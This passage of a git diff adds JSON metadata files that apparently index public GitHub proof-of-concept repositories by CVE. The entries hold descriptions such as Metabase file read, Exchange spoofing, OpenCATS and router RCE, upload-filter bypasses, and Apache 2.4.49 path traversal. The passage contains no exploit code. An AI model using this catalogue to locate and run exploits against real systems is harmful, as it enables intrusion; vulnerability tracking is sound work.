+ "html_url": "https:\/\/github.com\/zer0yu\/CVE-2021-41277",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-06T08:52:32Z",
+ "updated_at": "2023-08-09T19:14:29Z",
+ "pushed_at": "2021-12-06T10:23:45Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 446249616,
+ "name": "CVE-2021-41277_SSRF",
+ "full_name": "sasukeourad\/CVE-2021-41277_SSRF",
+ "owner": {
+ "login": "sasukeourad",
+ "id": 11887583,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11887583?v=4",
+ "html_url": "https:\/\/github.com\/sasukeourad"
+ },
+ "html_url": "https:\/\/github.com\/sasukeourad\/CVE-2021-41277_SSRF",
+ "description": "CVE-2021-41277 can be extended to an SSRF ",
+ "fork": false,
+ "created_at": "2022-01-10T01:52:10Z",
+ "updated_at": "2023-02-07T11:44:35Z",
+ "pushed_at": "2022-01-10T02:36:35Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 449795168,
+ "name": "Metabase_Nmap_Script",
+ "full_name": "frknktlca\/Metabase_Nmap_Script",
+ "owner": {
+ "login": "frknktlca",
+ "id": 39772097,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39772097?v=4",
+ "html_url": "https:\/\/github.com\/frknktlca"
+ },
+ "html_url": "https:\/\/github.com\/frknktlca\/Metabase_Nmap_Script",
+ "description": "It is a nmap script for metabase vulnerability (CVE-2021-41277)",
+ "fork": false,
+ "created_at": "2022-01-19T17:43:38Z",
+ "updated_at": "2022-01-19T17:44:35Z",
+ "pushed_at": "2022-01-19T17:52:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 468638331,
+ "name": "CVE-2021-41277",
+ "full_name": "chengling-ing\/CVE-2021-41277",
+ "owner": {
+ "login": "chengling-ing",
+ "id": 76235286,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76235286?v=4",
+ "html_url": "https:\/\/github.com\/chengling-ing"
+ },
+ "html_url": "https:\/\/github.com\/chengling-ing\/CVE-2021-41277",
+ "description": "MetaBase 任意文件读取",
+ "fork": false,
+ "created_at": "2022-03-11T06:39:38Z",
+ "updated_at": "2022-08-25T14:19:45Z",
+ "pushed_at": "2022-03-11T07:48:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 632067353,
+ "name": "PoC-Metabase-CVE-2021-41277",
+ "full_name": "RubXkuB\/PoC-Metabase-CVE-2021-41277",
+ "owner": {
+ "login": "RubXkuB",
+ "id": 104125912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104125912?v=4",
+ "html_url": "https:\/\/github.com\/RubXkuB"
+ },
+ "html_url": "https:\/\/github.com\/RubXkuB\/PoC-Metabase-CVE-2021-41277",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-24T16:34:13Z",
+ "updated_at": "2023-09-13T09:44:36Z",
+ "pushed_at": "2023-10-19T10:55:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41338.json b/2021/CVE-2021-41338.json
new file mode 100644
index 0000000000..9f7e0a83f6
--- /dev/null
+++ b/2021/CVE-2021-41338.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 472963061,
+ "name": "firewall-cve",
+ "full_name": "Mario-Kart-Felix\/firewall-cve",
+ "owner": {
+ "login": "Mario-Kart-Felix",
+ "id": 76971465,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76971465?v=4",
+ "html_url": "https:\/\/github.com\/Mario-Kart-Felix"
+ },
+ "html_url": "https:\/\/github.com\/Mario-Kart-Felix\/firewall-cve",
+ "description": "Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability CVE-2021-41338 Security Vulnerability Released: Oct 12, 2021 Assigning CNA: Microsoft MITRE CVE-2021-41338 CVSS:3.1 5.5 \/ 5.0 Attack Vector Local Attack Complexity Low Privileges Required Low User Interaction None Scope Unchanged Confidentiality High Integrity None Availability None Exploit Code Maturity Proof-of-Concept Remediation Level Official Fix Report Confidence Confirmed Please see Common Vulnerability Scoring System for more information on the definition of these metrics. Exploitability The following table provides an exploitability assessment for this vulnerability at the time of original publication. Yes No Exploitation Less Likely",
+ "fork": false,
+ "created_at": "2022-03-22T22:53:32Z",
+ "updated_at": "2022-03-22T22:56:29Z",
+ "pushed_at": "2022-03-29T02:29:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41349.json b/2021/CVE-2021-41349.json
new file mode 100644
index 0000000000..4394f5d0ec
--- /dev/null
+++ b/2021/CVE-2021-41349.json
@@ -0,0 +1,66 @@
+[
+ {
+ "id": 445117173,
+ "name": "CVE-2021-41349",
+ "full_name": "exploit-io\/CVE-2021-41349",
+ "owner": {
+ "login": "exploit-io",
+ "id": 71645666,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71645666?v=4",
+ "html_url": "https:\/\/github.com\/exploit-io"
+ },
+ "html_url": "https:\/\/github.com\/exploit-io\/CVE-2021-41349",
+ "description": "Exploiting: CVE-2021-41349",
+ "fork": false,
+ "created_at": "2022-01-06T09:44:15Z",
+ "updated_at": "2024-04-05T20:39:26Z",
+ "pushed_at": "2022-01-06T10:57:17Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41349",
+ "microsoft-exchange",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 519490745,
+ "name": "CVE-2021-41349",
+ "full_name": "0xrobiul\/CVE-2021-41349",
+ "owner": {
+ "login": "0xrobiul",
+ "id": 100078094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100078094?v=4",
+ "html_url": "https:\/\/github.com\/0xrobiul"
+ },
+ "html_url": "https:\/\/github.com\/0xrobiul\/CVE-2021-41349",
+ "description": "Microsoft Exchange Server Spoofing Vulnerability Exploit!",
+ "fork": false,
+ "created_at": "2022-07-30T10:51:55Z",
+ "updated_at": "2023-08-23T18:22:27Z",
+ "pushed_at": "2023-12-26T19:55:33Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41351.json b/2021/CVE-2021-41351.json
new file mode 100644
index 0000000000..600107a9e0
--- /dev/null
+++ b/2021/CVE-2021-41351.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 427883778,
+ "name": "CVE-2021-41351-POC",
+ "full_name": "JaneMandy\/CVE-2021-41351-POC",
+ "owner": {
+ "login": "JaneMandy",
+ "id": 36792635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4",
+ "html_url": "https:\/\/github.com\/JaneMandy"
+ },
+ "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2021-41351-POC",
+ "description": "CVE-2021-41351-poc",
+ "fork": false,
+ "created_at": "2021-11-14T09:14:56Z",
+ "updated_at": "2021-11-14T09:14:59Z",
+ "pushed_at": "2021-11-14T09:14:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41381.json b/2021/CVE-2021-41381.json
new file mode 100644
index 0000000000..2873f4e35d
--- /dev/null
+++ b/2021/CVE-2021-41381.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 414862526,
+ "name": "CVE-2021-41381",
+ "full_name": "Net-hunter121\/CVE-2021-41381",
+ "owner": {
+ "login": "Net-hunter121",
+ "id": 83981655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83981655?v=4",
+ "html_url": "https:\/\/github.com\/Net-hunter121"
+ },
+ "html_url": "https:\/\/github.com\/Net-hunter121\/CVE-2021-41381",
+ "description": "I have come-up with a POC for Payara Micro Community 5.2021.6 - Directory Traversal, Please refer above reference field.",
+ "fork": false,
+ "created_at": "2021-10-08T05:52:20Z",
+ "updated_at": "2022-05-06T12:00:55Z",
+ "pushed_at": "2021-10-08T05:54:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41511.json b/2021/CVE-2021-41511.json
new file mode 100644
index 0000000000..a5adc73596
--- /dev/null
+++ b/2021/CVE-2021-41511.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 412766915,
+ "name": "CVE-2021-41511",
+ "full_name": "vidvansh\/CVE-2021-41511",
+ "owner": {
+ "login": "vidvansh",
+ "id": 56179464,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56179464?v=4",
+ "html_url": "https:\/\/github.com\/vidvansh"
+ },
+ "html_url": "https:\/\/github.com\/vidvansh\/CVE-2021-41511",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-02T10:44:59Z",
+ "updated_at": "2021-10-02T10:46:57Z",
+ "pushed_at": "2021-10-02T10:46:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4154.json b/2021/CVE-2021-4154.json
new file mode 100644
index 0000000000..59ad359ad6
--- /dev/null
+++ b/2021/CVE-2021-4154.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 523600435,
+ "name": "CVE-2021-4154",
+ "full_name": "Markakd\/CVE-2021-4154",
+ "owner": {
+ "login": "Markakd",
+ "id": 18663141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18663141?v=4",
+ "html_url": "https:\/\/github.com\/Markakd"
+ },
+ "html_url": "https:\/\/github.com\/Markakd\/CVE-2021-4154",
+ "description": "CVE-2021-4154 exploit",
+ "fork": false,
+ "created_at": "2022-08-11T05:46:27Z",
+ "updated_at": "2024-06-11T03:07:02Z",
+ "pushed_at": "2022-10-07T04:56:36Z",
+ "stargazers_count": 66,
+ "watchers_count": 66,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 66,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 605477469,
+ "name": "CVE-2021-4154",
+ "full_name": "veritas501\/CVE-2021-4154",
+ "owner": {
+ "login": "veritas501",
+ "id": 25763545,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4",
+ "html_url": "https:\/\/github.com\/veritas501"
+ },
+ "html_url": "https:\/\/github.com\/veritas501\/CVE-2021-4154",
+ "description": "CVE-2021-4154",
+ "fork": false,
+ "created_at": "2023-02-23T08:38:22Z",
+ "updated_at": "2023-05-22T23:46:48Z",
+ "pushed_at": "2023-03-02T07:22:57Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41560.json b/2021/CVE-2021-41560.json
new file mode 100644
index 0000000000..3a6f5262a7
--- /dev/null
+++ b/2021/CVE-2021-41560.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 426630936,
+ "name": "RevCAT",
+ "full_name": "Nickguitar\/RevCAT",
+ "owner": {
+ "login": "Nickguitar",
+ "id": 3837916,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3837916?v=4",
+ "html_url": "https:\/\/github.com\/Nickguitar"
+ },
+ "html_url": "https:\/\/github.com\/Nickguitar\/RevCAT",
+ "description": "OpenCATS <= 0.9.4 RCE (CVE-2021-41560)",
+ "fork": false,
+ "created_at": "2021-11-10T13:24:01Z",
+ "updated_at": "2024-01-17T16:03:41Z",
+ "pushed_at": "2021-12-10T16:19:37Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41643.json b/2021/CVE-2021-41643.json
new file mode 100644
index 0000000000..8ce8d0cd5f
--- /dev/null
+++ b/2021/CVE-2021-41643.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 422727442,
+ "name": "CVE-2021-41643",
+ "full_name": "hax3xploit\/CVE-2021-41643",
+ "owner": {
+ "login": "hax3xploit",
+ "id": 24190623,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4",
+ "html_url": "https:\/\/github.com\/hax3xploit"
+ },
+ "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41643",
+ "description": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field.",
+ "fork": false,
+ "created_at": "2021-10-29T22:24:42Z",
+ "updated_at": "2021-10-29T22:27:10Z",
+ "pushed_at": "2021-10-29T22:27:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41644.json b/2021/CVE-2021-41644.json
new file mode 100644
index 0000000000..f496e9baef
--- /dev/null
+++ b/2021/CVE-2021-41644.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 422728006,
+ "name": "CVE-2021-41644",
+ "full_name": "hax3xploit\/CVE-2021-41644",
+ "owner": {
+ "login": "hax3xploit",
+ "id": 24190623,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4",
+ "html_url": "https:\/\/github.com\/hax3xploit"
+ },
+ "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41644",
+ "description": "Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters.",
+ "fork": false,
+ "created_at": "2021-10-29T22:28:01Z",
+ "updated_at": "2021-10-29T22:29:17Z",
+ "pushed_at": "2021-10-29T22:29:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41645.json b/2021/CVE-2021-41645.json
new file mode 100644
index 0000000000..d142cad4f2
--- /dev/null
+++ b/2021/CVE-2021-41645.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 422728380,
+ "name": "CVE-2021-41645",
+ "full_name": "hax3xploit\/CVE-2021-41645",
+ "owner": {
+ "login": "hax3xploit",
+ "id": 24190623,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4",
+ "html_url": "https:\/\/github.com\/hax3xploit"
+ },
+ "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41645",
+ "description": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. ",
+ "fork": false,
+ "created_at": "2021-10-29T22:30:21Z",
+ "updated_at": "2021-10-29T22:31:02Z",
+ "pushed_at": "2021-10-29T22:31:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41646.json b/2021/CVE-2021-41646.json
new file mode 100644
index 0000000000..0ae7a6f65b
--- /dev/null
+++ b/2021/CVE-2021-41646.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 422728610,
+ "name": "CVE-2021-41646",
+ "full_name": "hax3xploit\/CVE-2021-41646",
+ "owner": {
+ "login": "hax3xploit",
+ "id": 24190623,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190623?v=4",
+ "html_url": "https:\/\/github.com\/hax3xploit"
+ },
+ "html_url": "https:\/\/github.com\/hax3xploit\/CVE-2021-41646",
+ "description": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters..",
+ "fork": false,
+ "created_at": "2021-10-29T22:31:32Z",
+ "updated_at": "2023-12-09T00:12:15Z",
+ "pushed_at": "2021-10-29T22:32:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41647.json b/2021/CVE-2021-41647.json
new file mode 100644
index 0000000000..2d5deae29b
--- /dev/null
+++ b/2021/CVE-2021-41647.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411188978,
+ "name": "CVE-2021-41647",
+ "full_name": "MobiusBinary\/CVE-2021-41647",
+ "owner": {
+ "login": "MobiusBinary",
+ "id": 91082958,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4",
+ "html_url": "https:\/\/github.com\/MobiusBinary"
+ },
+ "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41647",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-28T07:59:21Z",
+ "updated_at": "2021-10-01T14:29:04Z",
+ "pushed_at": "2021-10-01T14:29:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41648.json b/2021/CVE-2021-41648.json
new file mode 100644
index 0000000000..4525194d68
--- /dev/null
+++ b/2021/CVE-2021-41648.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411945715,
+ "name": "CVE-2021-41648",
+ "full_name": "MobiusBinary\/CVE-2021-41648",
+ "owner": {
+ "login": "MobiusBinary",
+ "id": 91082958,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4",
+ "html_url": "https:\/\/github.com\/MobiusBinary"
+ },
+ "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41648",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-30T06:16:30Z",
+ "updated_at": "2021-10-01T13:50:36Z",
+ "pushed_at": "2021-10-01T13:50:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41649.json b/2021/CVE-2021-41649.json
new file mode 100644
index 0000000000..7ef24f5ae0
--- /dev/null
+++ b/2021/CVE-2021-41649.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411700383,
+ "name": "CVE-2021-41649",
+ "full_name": "MobiusBinary\/CVE-2021-41649",
+ "owner": {
+ "login": "MobiusBinary",
+ "id": 91082958,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4",
+ "html_url": "https:\/\/github.com\/MobiusBinary"
+ },
+ "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41649",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-29T14:09:34Z",
+ "updated_at": "2021-10-01T13:51:00Z",
+ "pushed_at": "2021-10-01T13:50:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41651.json b/2021/CVE-2021-41651.json
new file mode 100644
index 0000000000..626d944811
--- /dev/null
+++ b/2021/CVE-2021-41651.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411722444,
+ "name": "CVE-2021-41651",
+ "full_name": "MobiusBinary\/CVE-2021-41651",
+ "owner": {
+ "login": "MobiusBinary",
+ "id": 91082958,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91082958?v=4",
+ "html_url": "https:\/\/github.com\/MobiusBinary"
+ },
+ "html_url": "https:\/\/github.com\/MobiusBinary\/CVE-2021-41651",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-29T15:09:43Z",
+ "updated_at": "2021-10-01T16:29:06Z",
+ "pushed_at": "2021-10-01T16:27:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41652.json b/2021/CVE-2021-41652.json
new file mode 100644
index 0000000000..5077ec404e
--- /dev/null
+++ b/2021/CVE-2021-41652.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 652119603,
+ "name": "cve-2021-41652",
+ "full_name": "deathflash1411\/cve-2021-41652",
+ "owner": {
+ "login": "deathflash1411",
+ "id": 42869390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42869390?v=4",
+ "html_url": "https:\/\/github.com\/deathflash1411"
+ },
+ "html_url": "https:\/\/github.com\/deathflash1411\/cve-2021-41652",
+ "description": "Missing Access Control in BatFlat CMS 1.3.6",
+ "fork": false,
+ "created_at": "2023-06-11T06:33:01Z",
+ "updated_at": "2023-06-11T13:15:27Z",
+ "pushed_at": "2023-06-11T13:15:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41653.json b/2021/CVE-2021-41653.json
new file mode 100644
index 0000000000..745bac8872
--- /dev/null
+++ b/2021/CVE-2021-41653.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 432931914,
+ "name": "CVE-2021-41653",
+ "full_name": "likeww\/CVE-2021-41653",
+ "owner": {
+ "login": "likeww",
+ "id": 51168412,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51168412?v=4",
+ "html_url": "https:\/\/github.com\/likeww"
+ },
+ "html_url": "https:\/\/github.com\/likeww\/CVE-2021-41653",
+ "description": "TP-Link TL-WR840N EU v5 Remote Code Execution",
+ "fork": false,
+ "created_at": "2021-11-29T06:39:43Z",
+ "updated_at": "2023-11-18T03:11:04Z",
+ "pushed_at": "2021-11-28T01:16:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41730.json b/2021/CVE-2021-41730.json
new file mode 100644
index 0000000000..4487b4abeb
--- /dev/null
+++ b/2021/CVE-2021-41730.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 440172397,
+ "name": "CVE-2021-41730",
+ "full_name": "yezeting\/CVE-2021-41730",
+ "owner": {
+ "login": "yezeting",
+ "id": 67456948,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67456948?v=4",
+ "html_url": "https:\/\/github.com\/yezeting"
+ },
+ "html_url": "https:\/\/github.com\/yezeting\/CVE-2021-41730",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-20T13:03:19Z",
+ "updated_at": "2021-12-20T13:03:22Z",
+ "pushed_at": "2021-12-20T11:12:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41773.json b/2021/CVE-2021-41773.json
new file mode 100644
index 0000000000..57a0e73d8e
--- /dev/null
+++ b/2021/CVE-2021-41773.json
@@ -0,0 +1,3596 @@
+[
+ {
+ "id": 413890827,
+ "name": "cve-2021-41773",
+ "full_name": "Vulnmachines\/cve-2021-41773",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/cve-2021-41773",
+ "description": "CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.",
+ "fork": false,
+ "created_at": "2021-10-05T16:13:38Z",
+ "updated_at": "2024-04-24T17:28:30Z",
+ "pushed_at": "2022-08-30T11:58:32Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 413892415,
+ "name": "CVE-2021-41773",
+ "full_name": "numanturle\/CVE-2021-41773",
+ "owner": {
+ "login": "numanturle",
+ "id": 7007951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4",
+ "html_url": "https:\/\/github.com\/numanturle"
+ },
+ "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-41773",
+ "description": "CVE-2021-41773",
+ "fork": false,
